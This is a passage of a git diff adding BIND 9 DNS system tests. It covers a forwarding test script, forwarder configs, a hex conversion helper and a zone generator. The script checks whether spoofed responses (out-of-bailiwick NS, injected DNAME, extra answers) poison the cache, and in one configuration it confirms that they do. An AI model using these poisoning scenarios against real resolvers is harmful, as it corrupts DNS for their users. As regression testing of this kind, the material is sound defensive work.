+f2=10.53.0.4 + +status=0 +n=0 + +n=$((n+1)) +echo_i "checking that a forward zone overrides global forwarders ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example1. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example1. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward first zone no forwarders recurses ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward only zone no forwarders fails ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that global forwarders work ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example4. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example4. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward zone works ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example1. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example1. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that forwarding doesn't spontaneously happen ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward zone with no specified policy works ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example3. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example3. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward only doesn't recurse ($n)" +ret=0 +dig_with_opts txt.example5. txt @$f2 > dig.out.$n.f2 || ret=1 +grep "SERVFAIL" dig.out.$n.f2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking for negative caching of forwarder response ($n)" +# prime the cache, shutdown the forwarder then check that we can +# get the answer from the cache. restart forwarder. +ret=0 +dig_with_opts nonexist. txt @10.53.0.5 > dig.out.$n.f2 || ret=1 +grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null || ret=1 +stop_server ns4 || ret=1 +dig_with_opts nonexist. txt @10.53.0.5 > dig.out.$n.f2 || ret=1 +grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null || ret=1 +start_server --restart --noclean --port "${PORT}" ns4 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +check_override() ( + dig_with_opts 1.0.10.in-addr.arpa TXT @10.53.0.4 > dig.out.$n.f2 && + grep "status: NOERROR" dig.out.$n.f2 > /dev/null && + dig_with_opts 2.0.10.in-addr.arpa TXT @10.53.0.4 > dig.out.$n.f2 && + grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null +) + +n=$((n+1)) +echo_i "checking that forward only zone overrides empty zone ($n)" +ret=0 +# retry loop in case the server restart above causes transient failure +retry_quiet 10 check_override || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that DS lookups for grafting forward zones are isolated ($n)" +ret=0 +dig_with_opts grafted A @10.53.0.4 > dig.out.$n.q1 || ret=1 +dig_with_opts grafted DS @10.53.0.4 > dig.out.$n.q2 || ret=1 +dig_with_opts grafted A @10.53.0.4 > dig.out.$n.q3 || ret=1 +dig_with_opts grafted AAAA @10.53.0.4 > dig.out.$n.q4 || ret=1 +grep "status: NOERROR" dig.out.$n.q1 > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.$n.q2 > /dev/null || ret=1 +grep "status: NOERROR" dig.out.$n.q3 > /dev/null || ret=1 +grep "status: NOERROR" dig.out.$n.q4 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that rfc1918 inherited 'forward first;' zones are warned about ($n)" +ret=0 +$CHECKCONF rfc1918-inherited.conf | grep "forward first;" >/dev/null || ret=1 +$CHECKCONF rfc1918-notinherited.conf | grep "forward first;" >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that ULA inherited 'forward first;' zones are warned about ($n)" +ret=0 +$CHECKCONF ula-inherited.conf | grep "forward first;" >/dev/null || ret=1 +$CHECKCONF ula-notinherited.conf | grep "forward first;" >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +count_sent() ( + logfile="$1" + start_pattern="$2" + pattern="$3" + nextpartpeek "$logfile" | tr -d '\r' | sed -n "/$start_pattern/,/^\$/p" | grep -c "$pattern" +) + +check_sent() ( + expected="$1" + shift + count=$(count_sent "$@") + [ "$expected" = "$count" ] +) + +wait_for_log() ( + nextpartpeek "$1" | grep "$2" >/dev/null + +) + +n=$((n+1)) +echo_i "checking that a forwarder timeout prevents it from being reused in the same fetch context ($n)" +ret=0 +# Make ans6 receive queries without responding to them. +echo "//" | sendcmd +# Query for a record in a zone which is forwarded to a non-responding forwarder +# and is delegated from the root to check whether the forwarder will be retried +# when a delegation is encountered after falling back to full recursive +# resolution. +nextpart ns3/named.run >/dev/null +dig_with_opts txt.example7. txt @$f1 > dig.out.$n.f1 || ret=1 +# The forwarder for the "example7" zone should only be queried once. +start_pattern="sending packet to 10\.53\.0\.6" +retry_quiet 5 wait_for_log ns3/named.run "$start_pattern" +check_sent 1 ns3/named.run "$start_pattern" ";txt\.example7\.[[:space:]]*IN[[:space:]]*TXT$" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that priming queries are not forwarded ($n)" +ret=0 +nextpart ns7/named.run >/dev/null +dig_with_opts +noadd +noauth txt.example1. txt @10.53.0.7 > dig.out.$n.f7 || ret=1 +received_pattern="received packet from 10\.53\.0\.1" +start_pattern="sending packet to 10\.53\.0\.1" +retry_quiet 5 wait_for_log ns7/named.run "$received_pattern" || ret=1 +check_sent 1 ns7/named.run "$start_pattern" ";\.[[:space:]]*IN[[:space:]]*NS$" || ret=1 +sent=$(grep -c "10.53.0.7#.* (.): query '\./NS/IN' approved" ns4/named.run) +[ "$sent" -eq 0 ] || ret=1 +sent=$(grep -c "10.53.0.7#.* (.): query '\./NS/IN' approved" ns1/named.run) +[ "$sent" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking recovery from forwarding to a non-recursive server ($n)" +ret=0 +dig_with_opts xxx.sld.tld txt @10.53.0.8 > dig.out.$n.f8 || ret=1 +grep "status: NOERROR" dig.out.$n.f8 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that rebinding protection works in forward only mode ($n)" +ret=0 +# 10.53.0.5 will forward target.malicious. query to 10.53.0.4 +# which in turn will return a CNAME for subdomain.rebind. +# to honor the option deny-answer-aliases { "rebind"; }; +# ns5 should return a SERVFAIL to avoid potential rebinding attacks +dig_with_opts +noadd +noauth @10.53.0.5 target.malicious. > dig.out.$n || ret=1 +grep "status: SERVFAIL" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking switch from forwarding to normal resolution while chasing DS ($n)" +ret=0 +copy_setports ns3/named2.conf.in ns3/named.conf +rndccmd 10.53.0.3 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 +sendcmd << EOF +/ns1.sld.tld/A/ +300 A 10.53.0.2 +/sld.tld/NS/ +300 NS ns1.sld.tld. +/sld.tld/ +EOF +nextpart ns3/named.run >/dev/null +dig_with_opts @$f1 xxx.yyy.sld.tld ds > dig.out.$n.f1 || ret=1 +grep "status: SERVFAIL" dig.out.$n.f1 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Check various spoofed response scenarios. The same tests will be +# run twice, with "forward first" and "forward only" configurations. +# +run_spooftests () { + n=$((n+1)) + echo_i "checking spoofed response scenario 1 - out of bailiwick NS ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net > dig.out.$n.prime || ret=1 + # check 'net' is not poisoned. + dig_with_opts @10.53.0.9 diditwork.net. TXT > dig.out.$n.net || ret=1 + grep '^diditwork\.net\..*TXT.*"recursed"' dig.out.$n.net > /dev/null || ret=1 + # check 'sub.local.net' is not poisoned. + dig_with_opts @10.53.0.9 sub.local.net TXT > dig.out.$n.sub || ret=1 + grep '^sub\.local\.net\..*TXT.*"recursed"' dig.out.$n.sub > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking spoofed response scenario 2 - inject DNAME/net2. ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net2 > dig.out.$n.prime || ret=1 + # check that net2/DNAME is not cached + dig_with_opts @10.53.0.9 net2. DNAME > dig.out.$n.net2 || ret=1 + grep "ANSWER: 0," dig.out.$n.net2 > /dev/null || ret=1 + grep "status: NXDOMAIN" dig.out.$n.net2 > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking spoofed response scenario 3 - extra answer ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net3 > dig.out.$n.prime || ret=1 + # check extra net3 records are not cached + rndccmd 10.53.0.9 dumpdb -cache 2>&1 | sed 's/^/ns9 /' | cat_i + for try in 1 2 3 4 5; do + lines=$(grep "net3" ns9/named_dump.db | wc -l) + if [ ${lines} -eq 0 ]; then + sleep 1 + continue + fi + [ ${lines} -eq 1 ] || ret=1 + grep -q '^attackSecureDomain.net3' ns9/named_dump.db || ret=1 + grep -q '^local.net3' ns9/named_dump.db && ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +} + +echo_i "checking spoofed response scenarios with forward first zones" +run_spooftests + +copy_setports ns9/named2.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +echo_i "rechecking spoofed response scenarios with forward only zones" +run_spooftests + +# +# This scenario expects the spoofed response to succeed. The tests are +# similar to the ones above, but not identical. +# +echo_i "rechecking spoofed response scenarios with 'forward only' set globally" +copy_setports ns9/named3.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +n=$((n+1)) +echo_i "checking spoofed response scenario 1 - out of bailiwick NS ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 attackSecureDomain.net > dig.out.$n.prime || ret=1 +# check 'net' is poisoned. +dig_with_opts @10.53.0.9 diditwork.net. TXT > dig.out.$n.net || ret=1 +grep '^didItWork\.net\..*TXT.*"if you can see this record the attack worked"' dig.out.$n.net > /dev/null || ret=1 +# check 'sub.local.net' is poisoned. +dig_with_opts @10.53.0.9 sub.local.net TXT > dig.out.$n.sub || ret=1 +grep '^sub\.local\.net\..*TXT.*"if you see this attacker overrode local delegation"' dig.out.$n.sub > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking spoofed response scenario 2 - inject DNAME/net2. ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 attackSecureDomain.net2 > dig.out.$n.prime || ret=1 +# check that net2/DNAME is cached +dig_with_opts @10.53.0.9 net2. DNAME > dig.out.$n.net2 || ret=1 +grep "ANSWER: 1," dig.out.$n.net2 > /dev/null || ret=1 +grep "net2\..*IN.DNAME.net\.example\.lll\." dig.out.$n.net2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# This test doesn't use any forwarder clauses but is here because it +# is similar to forwarders, as the set of servers that can populate +# the namespace is defined by the zone content. +# +echo_i "rechecking spoofed response scenarios glue below local zone" +copy_setports ns9/named4.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +n=$((n+1)) +echo_i "checking sibling glue below zone ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 sibling.tld > dig.out.$n.prime || ret=1 +# check for glue A record for sub.local.tld is not used +dig_with_opts @10.53.0.9 sub.local.tld TXT > dig.out.$n.sub || ret=1 +grep "ANSWER: 1," dig.out.$n.sub > /dev/null || ret=1 +grep 'sub\.local\.tld\..*IN.TXT."good"$' dig.out.$n.sub > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/forward/ula-inherited.conf b/bin/tests/system/forward/ula-inherited.conf new file mode 100644 index 0000000..1fb94b1 --- /dev/null +++ b/bin/tests/system/forward/ula-inherited.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone d.f.ip6.arpa { + type forward; + forwarders { 1.2.3.4; }; +}; diff --git a/bin/tests/system/forward/ula-notinherited.conf b/bin/tests/system/forward/ula-notinherited.conf new file mode 100644 index 0000000..300001a --- /dev/null +++ b/bin/tests/system/forward/ula-notinherited.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone d.f.ip6.arpa { + type forward; + forward first; + forwarders { 1.2.3.4; }; +}; diff --git a/bin/tests/system/fromhex.pl b/bin/tests/system/fromhex.pl new file mode 100644 index 0000000..2a229e0 --- /dev/null +++ b/bin/tests/system/fromhex.pl @@ -0,0 +1,47 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Converts hex ascii into raw data. +# (This can be used, for example, to construct input for "wire_data -d".) + +require 5.006.001; + +use strict; +use IO::File; + +sub usage { + print ("Usage: packet.pl [file]\n"); + exit 1; +} + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + $line =~ s/#.*$//; + $input .= $line; +} + +$input =~ s/\s+//g; +my $data = pack("H*", $input); +my $len = length $data; + +binmode(STDOUT); +print($data); +exit(0); diff --git a/bin/tests/system/genzone.sh b/bin/tests/system/genzone.sh new file mode 100644 index 0000000..02e3b96 --- /dev/null +++ b/bin/tests/system/genzone.sh @@ -0,0 +1,511 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up a test zone +# +# Usage: genzone.sh master-server-number secondary-server-number... +# +# e.g., "genzone.sh 2 3 4" means ns2 is the master and ns3, ns4 +# are secondaries. +# + +master="$1" + +cat <<EOF +\$TTL 3600 + +@ 86400 IN SOA ns${master} hostmaster ( + 1397051952 ; "SER0" + 5 + 5 + 1814400 + 3600 ) +EOF + +for n +do + cat <<EOF +@ NS ns${n} +ns${n} A 10.53.0.${n} +EOF +done + +cat <<\EOF + +; type 1 +a01 A 0.0.0.0 +a02 A 255.255.255.255 + +; type 2 +; see NS records at top of file + +; type 3 +; md01 MD madname +; MD . + +; type 4 +; mf01 MF madname +; mf01 MF . + +; type 5 +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . + +; type 6 +; see SOA record at top of file + +; type 7 +mb01 MG madname +mb02 MG . + +; type 8 +mg01 MG mgmname +mg02 MG . + +; type 9 +mr01 MR mrname +mr02 MR . + +; type 10 +; NULL RRs are not allowed in master files per RFC1035. +;null01 NULL + +; type 11 +wks01 WKS 10.0.0.1 tcp telnet ftp 0 1 2 +wks02 WKS 10.0.0.1 udp domain 0 1 2 +wks03 WKS 10.0.0.2 tcp 65535 + +; type 12 +ptr01 PTR @ + +; type 13 +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO PC NetBSD + +; type 14 +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . + +; type 15 +mx01 MX 10 mail +mx02 MX 10 . + +; type 16 +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT foo +txt04 TXT foo bar +txt05 TXT "foo bar" +txt06 TXT "foo\032bar" +txt07 TXT foo\032bar +txt08 TXT "foo\010bar" +txt09 TXT foo\010bar +txt10 TXT foo\ bar +txt11 TXT "\"foo\"" +txt12 TXT \"foo\" +txt13 TXT "foo;" +txt14 TXT "foo\;" +txt15 TXT "bar\\;" + +; type 17 +rp01 RP mbox-dname txt-dname +rp02 RP . . + +; type 18 +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . + +; type 19 +x2501 X25 123456789 +;x2502 X25 "123456789" + +; type 20 +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN isdn-address +isdn04 ISDN isdn-address subaddress + +; type 21 +rt01 RT 0 intermediate-host +rt02 RT 65535 . + +; type 22 +nsap01 NSAP ( + 0x47.0005.80.005a00.0000.0001.e133.ffffff000161.00 ) +nsap02 NSAP ( + 0x47.0005.80.005a00.0000.0001.e133.ffffff000161.00. ) +;nsap03 NSAP 0x + +; type 23 +nsap-ptr01 NSAP-PTR foo. +nsap-ptr01 NSAP-PTR . + +; type 24 +;sig01 SIG NXT 1 3 ( 3600 20000102030405 +; 19961211100908 2143 foo.nil. +; MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I +; kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t +; VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) + +; type 25 +;key01 KEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY +; 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV +; sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg +; a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 26 +px01 PX 65535 foo. bar. +px02 PX 65535 . . + +; type 27 +gpos01 GPOS -22.6882 116.8652 250.0 +gpos02 GPOS "" "" "" + +; type 28 +aaaa01 AAAA ::1 +aaaa02 AAAA fd92:7065:b8e:ffff::5 + +; type 29 +loc01 LOC 60 9 N 24 39 E 10 20 2000 20 +loc02 LOC 60 09 00.000 N 24 39 00.000 E 10.00m 20.00m ( + 2000.00m 20.00m ) + +; type 30 +;nxt01 NXT a.secure.nil. ( NS SOA MX RRSIG KEY LOC NXT ) +;nxt02 NXT . NXT NSAP-PTR +;nxt03 NXT . 1 +;nxt04 NXT . 127 + +; type 31 +eid01 EID 12 89 AB + +; type 32 +nimloc01 NIMLOC 12 89 AB + +; type 33 +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box + +; type 34 +atma01 ATMA +61200000000 +atma02 ATMA +61.2.0000.0000 +atma03 ATMA 1234567890abcdef +atma04 ATMA f.e.d.c.b.a.0.9.8.7.6.5.4.3.2.1 + +; type 35 +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 blurgh blorf blllbb foo. +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. + +; type 36 +kx01 KX 10 kdc +kx02 KX 10 . + +; type 37 +cert01 CERT 65534 65535 254 ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I + kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t + VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) +; type 38 +a601 A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601 A6 64 ::ffff:ffff:ffff:ffff foo. +a601 A6 127 ::1 foo. +a601 A6 128 . + +; type 39 +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . + +; type 40 +sink01 SINK 1 0 0 +sink02 SINK 8 0 2 l4ik + +; type 41 +; OPT is a meta-type and should never occur in master files. + +; type 42 +apl01 APL !1:10.0.0.1/32 1:10.0.0.0/24 +apl02 APL + +; type 43 +ds01 DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds01 NS ns42 +ds02 DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +ds02 NS ns43 + +; type 44 +sshfp01 SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02 SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC + +; type 45 +ipseckey01 IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02 IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03 IPSECKEY ( 10 1 2 + 192.0.2.3 + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) +ipseckey04 IPSECKEY ( 10 3 2 + mygateway.example.com. + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) + +ipseckey05 IPSECKEY ( 10 2 2 + 2001:0DB8:0:8002::2000:1 + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) + +; type 46 +rrsig01 RRSIG NSEC 1 3 ( 3600 20000102030405 + 19961211100908 2143 foo.nil. + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I + kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t + VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) + +; type 47 +nsec01 NSEC a.secure.nil. ( NS SOA MX RRSIG DNSKEY LOC NSEC ) +nsec02 NSEC . NSEC NSAP-PTR +nsec03 NSEC . TYPE1 +nsec04 NSEC . TYPE127 + +; type 48 +dnskey01 DNSKEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 49 +dhcid01 DHCID ( AAIBY2/AuCccgoJbsaxcQc9TUapptP69l + OjxfNuVAA2kjEA= ) +dhcid02 DHCID ( AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdW + L3b/NaiUDlW2No= ) +dhcid03 DHCID ( AAABxLmlskllE0MVjd57zHcWmEH3pCQ6V + ytcKD//7es/deY= ) + +; type 50 +8f1tmio9avcom2k0frp92lgcumak0cad NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG + +; type 51 +; @ NSEC3PARAM 1 0 1 868BCF7ED4108929 + +; type 52 +tlsa TLSA ( 1 1 2 92003ba34942dc74152e2f2c408d29ec + a5a520e7f2e06bb944f4dca346baf63c + 1b177615d466f6c4b71c216a50292bd5 + 8c9ebdd2f74e38fe51ffd48c43326cbc ) + +; type 53 +smimea SMIMEA ( 1 1 2 92003ba34942dc74152e2f2c408d29ec + a5a520e7f2e06bb944f4dca346baf63c + 1b177615d466f6c4b71c216a50292bd5 + 8c9ebdd2f74e38fe51ffd48c43326cbc ) + +; type 54 (unassigned) + +; type 55 +hip1 HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D ) + +hip2 HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D + rvs.example.com. ) + +; type 56 +ninfo01 NINFO "foo" +ninfo02 NINFO "foo" "bar" +ninfo03 NINFO foo +ninfo04 NINFO foo bar +ninfo05 NINFO "foo bar" +ninfo06 NINFO "foo\032bar" +ninfo07 NINFO foo\032bar +ninfo08 NINFO "foo\010bar" +ninfo09 NINFO foo\010bar +ninfo10 NINFO foo\ bar +ninfo11 NINFO "\"foo\"" +ninfo12 NINFO \"foo\" +ninfo13 NINFO "foo;" +ninfo14 NINFO "foo\;" +ninfo15 NINFO "bar\\;" + +; type 57 +rkey01 RKEY 0 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 58 +talink0 TALINK . talink1 +talink1 TALINK talink0 talink2 +talink2 TALINK talink2 . + +; type 59 +cds01 CDS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 60 +cdnskey01 CDNSKEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 61 +openpgpkey OPENPGPKEY ( AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +;type 62 +csync01 CSYNC 0 0 A NS AAAA +csync02 CSYNC 0 0 + +;type 63 +zonemd01 ZONEMD 2019020700 1 1 ( + C220B8A6ED5728A971902F7E3D4FD93A + DEEA88B0453C2E8E8C863D465AB06CF3 + 4EB95B266398C98B59124FA239CB7EEB + ) +zonemd02 ZONEMD 2019020700 1 2 ( + 08CFA1115C7B948C4163A901270395EA + 226A930CD2CBCF2FA9A5E6EB85F37C8A + 4E114D884E66F176EAB121CB02DB7D65 + 2E0CC4827E7A3204F166B47E5613FD27 + ) + +; type 64 -- 98 (unassigned) + +; type 99 +spf01 SPF "v=spf1 